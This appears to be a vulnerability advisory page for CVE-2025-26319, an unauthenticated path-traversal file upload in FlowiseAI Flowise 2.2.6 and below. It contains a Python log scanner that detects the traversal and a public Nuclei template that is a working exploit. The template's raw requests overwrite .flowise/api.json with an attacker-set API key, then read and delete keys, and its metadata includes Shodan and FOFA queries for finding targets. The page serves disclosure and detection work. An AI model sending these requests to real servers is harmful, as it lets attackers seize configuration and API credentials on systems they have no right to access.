CVE-2025-26319: FlowiseAI Flowise <= 2.2.6 - Arbitrary File Upload

Date: 2025-08-01 | Affected software: FlowiseAI Flowise | PoC: public

Vulnerability description

FlowiseAI Flowise version 2.2.6 and below contains an arbitrary file upload vulnerability in the /api/v1/attachments endpoint. This vulnerability allows an unauthenticated attacker to upload files outside the intended directory through path traversal, potentially leading to API key exposure and remote code execution. The vulnerability can be exploited by uploading a malicious file to overwrite the .flowise/api.json configuration file.
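
The detection side of the traversal described above, as an added example that is not from the template's authors or the Flowise project: it flags POST requests to /api/v1/attachments/ whose path segments hide separators or dot-dot sequences behind percent-encoding. The combined access-log format, the identifier pattern and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

ATTACH_PREFIX = "/api/v1/attachments/"          # endpoint named in the advisory
SAFE_ID = re.compile(r"^[A-Za-z0-9_-]{1,64}$")  # assumption: IDs are UUID-like
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Constructed sample lines in combined log format (not from a real system).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Aug/2025:10:00:01 +0000] "POST /api/v1/attachments/3f2b8c1e-9a4d-4e7b-8c2a-1d5e6f7a8b9c/chat-42 HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Aug/2025:10:00:05 +0000] "POST /api/v1/attachments/..%2f..%2fdata%2f/.flowise HTTP/1.1" 200 498',
    '203.0.113.9 - - [01/Aug/2025:10:00:06 +0000] "GET /api/v1/apikey HTTP/1.1" 200 230',
]

def fully_decode(text, max_rounds=3):
    """Percent-decode until stable so nested encodings are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def check_line(line):
    """Return (status, reason) for a suspicious attachment upload, else None."""
    m = REQUEST.search(line)
    if not m or m.group("method") != "POST":
        return None
    raw = m.group("path").split("?", 1)[0]
    if not raw.lower().startswith(ATTACH_PREFIX):
        return None
    # Split on literal '/' before decoding: a separator hidden inside one
    # segment by percent-encoding is the signature of this bug class.
    for seg in filter(None, raw[len(ATTACH_PREFIX):].split("/")):
        decoded = fully_decode(seg)
        if ".." in decoded or "/" in decoded or "\\" in decoded:
            return int(m.group("status")), f"traversal in segment {seg!r}"
        if not SAFE_ID.match(decoded):
            return int(m.group("status")), f"non-identifier segment {seg!r}"
    return None

def scan(lines):
    """Return [(line_number, status, reason)] for every flagged line."""
    hits = ((n, check_line(line)) for n, line in enumerate(lines, 1))
    return [(n, *hit) for n, hit in hits if hit]

if __name__ == "__main__":
    for n, status, reason in scan(SAMPLE_LOG):
        print(f"line {n}: HTTP {status}: {reason}")
```

A flagged line with status 200 deserves priority in triage, since it suggests the server accepted the upload rather than rejecting the path.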

PoC code [public]

id: CVE-2025-26319

info:
  name: FlowiseAI Flowise <= 2.2.6 - Arbitrary File Upload
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    FlowiseAI Flowise version 2.2.6 and below contains an arbitrary file upload vulnerability in the /api/v1/attachments endpoint. This vulnerability allows an unauthenticated attacker to upload files outside the intended directory through path traversal, potentially leading to API key exposure and remote code execution. The vulnerability can be exploited by uploading a malicious file to overwrite the .flowise/api.json configuration file.
  reference:
    - https://github.com/advisories/GHSA-69jq-qr7w-j7qh
    - https://github.com/FlowiseAI/Flowise
    - https://nvd.nist.gov/vuln/detail/CVE-2025-26319
  classification:
    epss-score: 0.81041
    epss-percentile: 0.99122
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cve-id: CVE-2025-26319
    cwe-id: CWE-434
  metadata:
    verified: true
    max-request: 3
    vendor: FlowiseAI
    product: Flowise
    shodan-query: title:"Flowise"
    fofa-query: title="Flowise"
  tags: cve,cve2025,flowise,fileupload,intrusive,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /api/v1/attachments/..%2f..%2f..%2f..%2f..%2froot%2f/.flowise HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydTh0yj8zypRgPT1w

        ------WebKitFormBoundarydTh0yj8zypRgPT1w
        Content-Disposition: form-data; name="files";filename="api.json"
        Content-type: text/plain

        [{
        "keyName":"=",
        "apiKey":"24NHxsKIZi7Ee34rl7FtW3dtW1IuYjFQDegXP_Bn8yQ",
        "apiSecret":"8648f55db62716a6577b565efb66145b9ad8c50884c57ae8d4f03c4cd8b3ee27b1f77804d320f08bac8aa4b0dbf58a39dacbb767eb05efe1e57d5c66e5d48473.af4b3f229bd11ac5",
        "createdAt":"111",
        "id":"1111"
        }]
        ------WebKitFormBoundarydTh0yj8zypRgPT1w--

    matchers:
      - type: word
        part: body
        words:
          - 'name":'
          - 'mimeType":"text/plain'
        condition: and
        internal: true

  - raw:
      - |
        GET /api/v1/apikey HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer 24NHxsKIZi7Ee34rl7FtW3dtW1IuYjFQDegXP_Bn8yQ

      - |
        DELETE /api/v1/apikey/1111 HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer 24NHxsKIZi7Ee34rl7FtW3dtW1IuYjFQDegXP_Bn8yQ

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'apiKey":"'
          - 'apiSecret":'
          - 'chatFlows'
        condition: and

      - type: status
        status:
          - 200
# digest: 490a00463044022061841e21ccdba3d36ecc98b8c26bb0e70c1545b3d08805ab3916d58775fb842f022039814699f6aa1af37f497e387277e266b5e3196ac88e4491248c90839d10eb8d:922c64590222798bb761d5b6d8e72950
